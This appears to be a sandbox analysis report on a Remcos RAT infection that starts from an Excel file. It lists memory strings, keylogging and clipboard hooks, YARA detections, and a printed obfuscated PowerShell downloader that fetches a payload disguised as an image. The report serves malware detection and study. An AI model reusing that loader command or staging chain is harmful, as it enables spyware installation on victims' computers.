            Source: wscript.exe, 00000009.00000003.432521109.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431629042.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431571140.0000000003AD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431892049.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.436432327.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431591415.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.477785176.0000000005030000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
            Source: wscript.exe, 00000009.00000003.432521109.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431629042.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431571140.0000000003AD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431892049.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.436432327.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431591415.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.477785176.0000000005030000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
            Source: wscript.exe, 00000009.00000003.432521109.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431629042.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431571140.0000000003AD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431892049.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.436432327.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431591415.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.477785176.0000000005030000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
            Source: wscript.exe, 00000009.00000003.432521109.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431629042.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431571140.0000000003AD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431892049.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.436432327.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431591415.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.477785176.0000000005030000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
            Source: powershell.exe, 0000000A.00000002.549227483.00000000027D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.466787853.0000000002771000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.465713352.0000000002771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: wscript.exe, 00000009.00000003.432521109.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431629042.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431571140.0000000003AD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431892049.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.436432327.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431591415.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.477785176.0000000005030000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
            Source: wscript.exe, 00000009.00000003.432521109.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431629042.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431571140.0000000003AD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431892049.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.436432327.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431591415.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.477785176.0000000005030000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
            Source: z2.ink.url.4.drString found in binary or memory: http://z2.ink/
            Source: Ref19920830281982938RT.xls, nLNG.url.4.drString found in binary or memory: http://z2.ink/nLNG
            Source: FE430000.0.dr, ~DF413A5A3890D32AE4.TMP.0.drString found in binary or memory: http://z2.ink/nLNGyX
            Source: wscript.exe, 00000009.00000003.431940170.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431970404.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.433992431.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431827511.000000000079A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
            Source: wscript.exe, 00000009.00000003.431940170.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431970404.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.433992431.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431827511.000000000079A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
            Source: wscript.exe, 00000009.00000003.431940170.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431970404.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.433992431.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431827511.000000000079A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
            Source: wscript.exe, 00000009.00000003.431940170.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431970404.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.433992431.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431827511.000000000079A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
            Source: powershell.exe, 0000000C.00000002.466787853.0000000003799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 0000000C.00000002.466787853.0000000003799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 0000000C.00000002.466787853.0000000003799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: wscript.exe, 00000009.00000003.431940170.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431970404.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.433992431.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431827511.000000000079A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
            Source: wscript.exe, 00000009.00000003.431940170.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431970404.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.433992431.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431827511.000000000079A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;
            Source: powershell.exe, 0000000C.00000002.466787853.0000000003799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: wscript.exe, 00000009.00000003.431940170.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431827511.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.433509390.00000000006D4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.433992431.0000000000716000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431970404.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431827511.000000000079A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/iuC2i
            Source: wscript.exe, 00000009.00000003.431827511.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.433992431.0000000000716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/iuC2igv
            Source: wscript.exe, 00000009.00000002.436417928.0000000003AA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/e
            Source: wscript.exe, 00000009.00000003.432521109.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431629042.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431571140.0000000003AD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431892049.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.436432327.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431591415.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.477785176.0000000005030000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
            Source: wscript.exe, 00000009.00000003.431940170.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431970404.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.433992431.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431827511.000000000079A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.gravatar.com
            Source: wscript.exe, 00000009.00000003.431940170.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431970404.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.433992431.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431827511.000000000079A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://themes.googleusercontent.com
            Source: powershell.exe, 0000000C.00000002.466787853.00000000028AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uploaddeimagens.com.br
            Source: powershell.exe, 0000000C.00000002.477785176.0000000005013000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uploaddeimagens.com.br/images/00
            Source: powershell.exe, 0000000C.00000002.466017329.00000000003F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634
            Source: wscript.exe, 00000009.00000003.431940170.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431970404.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.433992431.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431827511.000000000079A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: wscript.exe, 00000009.00000003.431940170.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431970404.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.433992431.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431827511.000000000079A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
            Source: wscript.exe, 00000009.00000003.431940170.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431970404.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.433992431.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431827511.000000000079A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49173
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
            Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49172 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Contains functionality to register a low level keyboard hook
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040A2B8 SetWindowsHookExA 0000000D,0040A2A4,0000000017_2_0040A2B8
            Installs a global keyboard hook
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,17_2_0040B70E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,17_2_004168C1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,17_2_0040B70E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,17_2_0040A3E0

            E-Banking Fraud

            barindex
            Yara detected Remcos RAT
            Source: Yara matchFile source: 17.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.powershell.exe.465ae68.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.powershell.exe.465ae68.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.1078551055.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.466787853.0000000004477000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3608, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3972, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\note\nots.dat, type: DROPPED

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 17.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 17.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 17.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 17.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 17.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 17.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 12.2.powershell.exe.465ae68.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 12.2.powershell.exe.465ae68.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 12.2.powershell.exe.465ae68.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 12.2.powershell.exe.465ae68.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 12.2.powershell.exe.465ae68.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 0000000C.00000002.466787853.0000000004477000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: Process Memory Space: powershell.exe PID: 3508, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 3608, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: Process Memory Space: powershell.exe PID: 3608, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: RegAsm.exe PID: 3972, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\lioniskingandtigerisalsotryingforkingbutdifferentistheattitudeofthistwoanimalaredifferentlionsisalwaysalionitsucantcomparewith__anyotherbecauselionbeauties[1].doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A9EAB33D.doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
            Excel sheet contains many unusual embedded objects
            Source: Ref19920830281982938RT.xlsOLE: Microsoft Excel 2007+
            Source: FE430000.0.drOLE: Microsoft Excel 2007+
            Microsoft Office drops suspicious files
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\nLNG.urlJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\z2.ink.urlJump to behavior
            Very long command line found
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 8818
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 8818Jump to behavior
            Windows Scripting host queries suspicious COM object (likely to drop second stage)
            Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}\ProgIDJump to behavior
            Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
            Wscript starts Powershell (via cmd or directly)
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhD
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC